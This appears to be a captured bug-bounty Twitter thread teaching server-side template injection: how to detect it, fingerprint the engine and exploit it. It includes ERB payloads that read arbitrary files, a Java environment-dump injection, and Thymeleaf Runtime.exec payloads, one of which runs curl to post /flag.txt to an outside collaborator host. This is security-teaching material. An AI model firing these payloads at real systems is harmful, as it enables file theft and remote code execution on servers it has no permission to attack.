1/
Vuln: SSTI
Severity: Severity of the issue depends on from the engine that has been used
Server-side template injection occurs when user input is unsafely embedded into a server-side template, allowing users to inject template directives.
#bugbountytips #securitytips #SSTI
Vuln: SSTI
Severity: Severity of the issue depends on from the engine that has been used
Server-side template injection occurs when user input is unsafely embedded into a server-side template, allowing users to inject template directives.
#bugbountytips #securitytips #SSTI
2/
Constructing a server-side template injection attack
Detect → Identify → Exploit
- Detect if SST is vulnerable to attack
• Identify the engine that the server uses. There are a huge number of templating languages, characters.
• Develop exploit on received data
Constructing a server-side template injection attack
Detect → Identify → Exploit
- Detect if SST is vulnerable to attack
• Identify the engine that the server uses. There are a huge number of templating languages, characters.
• Develop exploit on received data
3/
How you can detect SSTI:
Try fuzzing the template by injecting a sequence of special characters, such as `${{<%[%'"}}%`
Vulnerable code: render('Hello ' + username)
Request: "vulnerable-website.com/?username=${7*7}"
If the resulting output - `Hello 49` executes a mathematical operation
How you can detect SSTI:
Try fuzzing the template by injecting a sequence of special characters, such as `${{<%[%'"}}%`
Vulnerable code: render('Hello ' + username)
Request: "vulnerable-website.com/?username=${7*7}"
If the resulting output - `Hello 49` executes a mathematical operation
4/
Once you have detected the template injection potential, the next step is to identify the template engine.
A common way of doing this is to inject arbitrary mathematical operations using syntax from different template engines.
Use this decision tree to identify the engine:
Once you have detected the template injection potential, the next step is to identify the template engine.
A common way of doing this is to inject arbitrary mathematical operations using syntax from different template engines.
Use this decision tree to identify the engine:
5/
Exploit:
Read→Explore→Attack
The first step after finding template injection and identifying the template engine is to read the docs.
Key areas of interest are:
covering basic syntax
'Security Considerations’ section
Lists of builtin methods, functions, filters, variables.
Exploit:
Read→Explore→Attack
The first step after finding template injection and identifying the template engine is to read the docs.
Key areas of interest are:
covering basic syntax
'Security Considerations’ section
Lists of builtin methods, functions, filters, variables.
6/
For example, in ERB, the documentation reveals that you can list all directories and then read arbitrary files as follows:
`<%= Dir.entries('/') %>
<%= File.open('/example/arbitrary-file').read %>`
For example, in ERB, the documentation reveals that you can list all directories and then read arbitrary files as follows:
`<%= Dir.entries('/') %>
<%= File.open('/example/arbitrary-file').read %>`
7/
Explore:
Explore the environment and try to discover all the objects to which you have access
Many template engines expose a "self" or "environment" object, which acts like a namespace containing all objects, methods, and attributes that are supported by the engine.
Explore:
Explore the environment and try to discover all the objects to which you have access
Many template engines expose a "self" or "environment" object, which acts like a namespace containing all objects, methods, and attributes that are supported by the engine.
8/
If such an object exists, you can potentially use it to generate a list of objects that are in scope.
For example, in Java-based templating languages, you can sometimes list all variables in the environment using the following injection:
${T(java.lang.System).getenv()}
If such an object exists, you can potentially use it to generate a list of objects that are in scope.
For example, in Java-based templating languages, you can sometimes list all variables in the environment using the following injection:
${T(java.lang.System).getenv()}
9/
Exploit
Now you should have a firm idea of the attack surface available to you and be able to proceed with traditional security audit techniques, reviewing function for exploitable vuln.
In this wordlist you can find variables defined in the environments of some engines
Exploit
Now you should have a firm idea of the attack surface available to you and be able to proceed with traditional security audit techniques, reviewing function for exploitable vuln.
In this wordlist you can find variables defined in the environments of some engines
10/
Example:
<a th:href="@{__${path}__}" th:title="${title}">
<a th:href="${''.getClass().forName('java.lang.Runtime').
getRuntime().exec('curl -d @/flag.txt
burpcollab.com')}" th:title='pepito'>
http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
Example:
<a th:href="@{__${path}__}" th:title="${title}">
<a th:href="${''.getClass().forName('java.lang.Runtime').
getRuntime().exec('curl -d @/flag.txt
burpcollab.com')}" th:title='pepito'>
http://localhost:8082/(${T(java.lang.Runtime).getRuntime().exec('calc')})
• • •
Missing some Tweet in this thread? You can try to
force a refresh
